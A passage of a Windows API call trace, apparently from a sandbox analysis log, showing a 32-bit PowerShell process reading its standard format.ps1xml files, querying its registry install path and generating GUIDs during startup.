	[0224.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0224.529] GetLastError () returned 0xcb
	[0224.529] SetErrorMode (uMode=0x1) returned 0x1
	[0224.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0224.529] GetLastError () returned 0xcb
	[0224.529] SetErrorMode (uMode=0x1) returned 0x1
	[0224.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0224.529] GetLastError () returned 0xcb
	[0224.530] SetErrorMode (uMode=0x1) returned 0x1
	[0224.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0224.530] GetLastError () returned 0xcb
	[0224.530] SetErrorMode (uMode=0x1) returned 0x1
	[0224.530] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0224.530] GetLastError () returned 0xcb
	[0224.530] SetErrorMode (uMode=0x1) returned 0x1
	[0224.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0224.530] GetLastError () returned 0xcb
	[0224.530] SetErrorMode (uMode=0x1) returned 0x1
	[0224.530] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0224.530] GetLastError () returned 0xcb
	[0224.530] SetErrorMode (uMode=0x1) returned 0x1
	[0224.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e738, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0224.531] GetLastError () returned 0xcb
	[0224.531] SetErrorMode (uMode=0x1) returned 0x1
	[0224.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ebb8 | out: lpFileInformation=0x10ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0224.531] GetLastError () returned 0xcb
	[0224.531] SetErrorMode (uMode=0x1) returned 0x1
	[0224.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.532] GetLastError () returned 0xcb
	[0224.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.544] GetLastError () returned 0xcb
	[0224.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.544] GetLastError () returned 0xcb
	[0224.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5090b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.547] GetLastError () returned 0xcb
	[0224.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.547] GetLastError () returned 0xcb
	[0224.547] SetErrorMode (uMode=0x1) returned 0x1
	[0224.548] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0224.548] GetLastError () returned 0x0
	[0224.548] GetFileType (hFile=0x334) returned 0x1
	[0224.548] SetErrorMode (uMode=0x1) returned 0x1
	[0224.548] GetFileType (hFile=0x334) returned 0x1
	[0224.548] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.548] GetLastError () returned 0x0
	[0224.549] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.549] GetLastError () returned 0x0
	[0224.549] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.549] GetLastError () returned 0x0
	[0224.549] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.549] GetLastError () returned 0x0
	[0224.550] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.550] GetLastError () returned 0x0
	[0224.550] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.550] GetLastError () returned 0x0
	[0224.550] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x9e2, lpOverlapped=0x0) returned 1
	[0224.550] GetLastError () returned 0x0
	[0224.550] ReadFile (in: hFile=0x334, lpBuffer=0x2d5e88a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5e88a*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0224.550] GetLastError () returned 0x0
	[0224.550] ReadFile (in: hFile=0x334, lpBuffer=0x2d5f308, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d5f308*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0224.550] GetLastError () returned 0x0
	[0224.550] CloseHandle (hObject=0x334) returned 1
	[0224.551] GetLastError () returned 0x0
	[0224.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.551] GetLastError () returned 0x0
	[0224.551] SetErrorMode (uMode=0x1) returned 0x1
	[0224.551] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d703c4 | out: lpFileInformation=0x2d703c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0224.551] GetLastError () returned 0x0
	[0224.551] SetErrorMode (uMode=0x1) returned 0x1
	[0224.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.551] GetLastError () returned 0x0
	[0224.551] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x334) returned 0x0
	[0224.551] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0224.551] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0224.552] RegCloseKey (hKey=0x334) returned 0x0
	[0224.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.552] GetLastError () returned 0x0
	[0224.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.552] GetLastError () returned 0x0
	[0224.562] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xbf40a5, Data2=0xba2f, Data3=0x4d78, Data4=([0]=0xa7, [1]=0xc4, [2]=0xef, [3]=0xca, [4]=0xac, [5]=0x86, [6]=0xc6, [7]=0x30))) returned 0x0
	[0224.676] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x47a20030, Data2=0x67bd, Data3=0x41ee, Data4=([0]=0xb9, [1]=0x5c, [2]=0xd8, [3]=0xb6, [4]=0x78, [5]=0xbb, [6]=0xc4, [7]=0x44))) returned 0x0
	[0224.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.678] GetLastError () returned 0x0
	[0224.678] SetErrorMode (uMode=0x1) returned 0x1
	[0224.678] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0224.678] GetLastError () returned 0x0
	[0224.678] GetFileType (hFile=0x334) returned 0x1
	[0224.678] SetErrorMode (uMode=0x1) returned 0x1
	[0224.678] GetFileType (hFile=0x334) returned 0x1
	[0224.678] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.679] GetLastError () returned 0x0
	[0224.679] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.679] GetLastError () returned 0x0
	[0224.679] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.679] GetLastError () returned 0x0
	[0224.680] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.680] GetLastError () returned 0x0
	[0224.680] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.680] GetLastError () returned 0x0
	[0224.681] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0xfb2, lpOverlapped=0x0) returned 1
	[0224.681] GetLastError () returned 0x0
	[0224.681] ReadFile (in: hFile=0x334, lpBuffer=0x2d82dfe, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d82dfe*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0224.681] GetLastError () returned 0x0
	[0224.681] ReadFile (in: hFile=0x334, lpBuffer=0x2d836ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2d836ac*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0224.682] GetLastError () returned 0x0
	[0224.682] CloseHandle (hObject=0x334) returned 1
	[0224.682] GetLastError () returned 0x0
	[0224.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.682] GetLastError () returned 0x0
	[0224.682] SetErrorMode (uMode=0x1) returned 0x1
	[0224.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2da3f3c | out: lpFileInformation=0x2da3f3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0224.682] GetLastError () returned 0x0
	[0224.682] SetErrorMode (uMode=0x1) returned 0x1
	[0224.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.682] GetLastError () returned 0x0
	[0224.682] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e9b8 | out: phkResult=0x10e9b8*=0x334) returned 0x0
	[0224.683] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x0, lpcbData=0x10e9fc*=0x0 | out: lpType=0x10ea00*=0x1, lpData=0x0, lpcbData=0x10e9fc*=0x56) returned 0x0
	[0224.683] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ea00, lpData=0x5090b0, lpcbData=0x10e9fc*=0x56 | out: lpType=0x10ea00*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e9fc*=0x56) returned 0x0
	[0224.683] RegCloseKey (hKey=0x334) returned 0x0
	[0224.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.683] GetLastError () returned 0x0
	[0224.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0224.683] GetLastError () returned 0x0
	[0224.685] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x66cc52e0, Data2=0x56da, Data3=0x452a, Data4=([0]=0x8d, [1]=0x50, [2]=0xf7, [3]=0x92, [4]=0xb0, [5]=0xa7, [6]=0xb6, [7]=0xea))) returned 0x0
	[0224.695] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x8232f668, Data2=0x188a, Data3=0x4908, Data4=([0]=0xa1, [1]=0xa0, [2]=0xa7, [3]=0x12, [4]=0xe6, [5]=0x56, [6]=0x4a, [7]=0x47))) returned 0x0
	[0224.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x8f1392f1, Data2=0xcbe2, Data3=0x46ca, Data4=([0]=0x94, [1]=0x18, [2]=0x42, [3]=0x3d, [4]=0x5d, [5]=0x7c, [6]=0xe2, [7]=0xd7))) returned 0x0
	[0224.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0x7665fdd, Data2=0x856a, Data3=0x41ce, Data4=([0]=0xa8, [1]=0x2, [2]=0x31, [3]=0xe7, [4]=0xa8, [5]=0x5e, [6]=0xf1, [7]=0x57))) returned 0x0
	[0224.697] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xb7a5ebb4, Data2=0xcedd, Data3=0x4bda, Data4=([0]=0xb4, [1]=0x1, [2]=0xfa, [3]=0x7a, [4]=0x4, [5]=0x1e, [6]=0x1d, [7]=0xcd))) returned 0x0
	[0224.698] CoCreateGuid (in: pguid=0x10ea28 | out: pguid=0x10ea28*(Data1=0xc1725901, Data2=0x980, Data3=0x4ffe, Data4=([0]=0xb0, [1]=0x9, [2]=0xdb, [3]=0xb5, [4]=0xf4, [5]=0x30, [6]=0x37, [7]=0xb4))) returned 0x0
	[0224.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e4cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.698] GetLastError () returned 0x0
	[0224.698] SetErrorMode (uMode=0x1) returned 0x1
	[0224.698] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0224.699] GetLastError () returned 0x0
	[0224.699] GetFileType (hFile=0x334) returned 0x1
	[0224.699] SetErrorMode (uMode=0x1) returned 0x1
	[0224.699] GetFileType (hFile=0x334) returned 0x1
	[0224.699] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.699] GetLastError () returned 0x0
	[0224.700] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.700] GetLastError () returned 0x0
	[0224.700] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.700] GetLastError () returned 0x0
	[0224.700] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.701] GetLastError () returned 0x0
	[0224.702] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.702] GetLastError () returned 0x0
	[0224.702] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x1000, lpOverlapped=0x0) returned 1
	[0224.702] GetLastError () returned 0x0
	[0224.702] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0xaca, lpOverlapped=0x0) returned 1
	[0224.702] GetLastError () returned 0x0
	[0224.702] ReadFile (in: hFile=0x334, lpBuffer=0x2dc2f4e, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc2f4e*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0224.702] GetLastError () returned 0x0
	[0224.702] ReadFile (in: hFile=0x334, lpBuffer=0x2dc38e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10ea34, lpOverlapped=0x0 | out: lpBuffer=0x2dc38e4*, lpNumberOfBytesRead=0x10ea34*=0x0, lpOverlapped=0x0) returned 1
	[0224.702] GetLastError () returned 0x0
	[0224.702] CloseHandle (hObject=0x334) returned 1
	[0224.702] GetLastError () returned 0x0
	[0224.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0224.702] GetLastError () returned 0x0
	[0224.702] SetErrorMode (uMode=0x1) returned 0x1
